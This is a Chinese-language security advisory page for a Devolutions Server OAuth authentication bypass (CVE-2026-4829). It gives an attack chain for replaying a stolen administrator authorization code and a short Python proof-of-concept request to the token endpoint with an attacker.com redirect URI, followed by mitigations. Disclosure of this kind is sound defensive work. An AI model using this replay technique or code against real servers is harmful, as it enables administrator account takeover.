CVE-2026-4829 CVSS 5.4 中危

CVE-2026-4829 Devolutions Server认证绕过漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4829

漏洞类型

认证绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server 2026.1.11及其之前版本在处理外部OAuth身份验证流程时存在不当认证漏洞。该漏洞允许已获得系统访问权限的低级别用户，通过重用外部认证流程中的会话代码，冒充系统内的其他用户，包括拥有最高权限的管理员账户。由于系统未能正确校验会话代码的有效性和唯一性，攻击者可以利用此缺陷绕过常规的身份验证检查，进而获取受保护数据的访问权限或破坏系统完整性，造成严重的安全风险。

技术细节

该漏洞的技术核心在于Devolutions Server对外部OAuth流程中授权码的处理机制存在逻辑缺陷。在标准的OAuth 2.0协议中，授权码应当具有一次性使用的特性，且必须严格与请求的客户端ID和用户会话绑定。然而，受影响版本的Devolutions Server未能在服务端有效强制执行这一限制，导致授权码可以被重放或重用。攻击者在拥有一个普通账户的前提下，可以通过网络嗅探、日志分析或利用系统逻辑缺陷获取到目标用户（如管理员）在OAuth认证过程中产生的有效会话代码。随后，攻击者构造特定的请求包，将该会话代码提交给服务端进行令牌交换。由于服务端错误地接受了该代码，攻击者成功获取了目标用户的身份令牌，从而实现了无需密码的账户接管和权限提升。

攻击链分析

STEP 1

1. 信息收集

攻击者确认目标使用Devolutions Server并启用了外部OAuth认证功能。

STEP 2

2. 获取初始权限

攻击者注册或使用已有的低权限账户登录系统。

STEP 3

3. 获取会话代码

攻击者通过抓包、日志查看或诱导管理员进行OAuth登录，获取有效的会话代码。

STEP 4

4. 重放攻击

攻击者利用自己的会话环境，重用获取到的管理员的会话代码向服务器请求令牌。

STEP 5

5. 权限提升

服务器验证通过，返回管理员令牌，攻击者成功接管管理员账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for token endpoint
target_url = "https://<devolutions-server>/oauth/token"

# The session code captured or reused from an external auth flow
reused_session_code = "CAPTURED_AUTHORIZATION_CODE"

# Payload to exploit the improper authentication
payload = {
    "grant_type": "authorization_code",
    "code": reused_session_code,
    "client_id": "attacker_client_id",
    "redirect_uri": "https://attacker.com/callback"
}

try:
    # Send the request to exchange the code for an access token
    response = requests.post(target_url, data=payload)

    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Access Token: " + response.json().get("access_token"))
    else:
        print("[-] Exploit Failed. Status Code: " + str(response.status_code))
        print(response.text)
except Exception as e:
    print("Error: " + str(e))

影响范围

Devolutions Server <= 2026.1.11

防御指南

临时缓解措施

在未完成补丁升级前，建议管理员暂时禁用外部OAuth认证集成，仅使用本地凭据进行身份验证。同时，应启用详细日志审计，监控是否存在异常的会话代码使用或非预期的管理员登录行为，并及时更改所有管理员密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4829
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4829
3 Details https://www.cvedetails.com/cve/CVE-2026-4829/
4 VulDB https://vuldb.com/cve/CVE-2026-4829
5 Link https://devolutions.net/security/advisories/DEVO-2026-0010

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表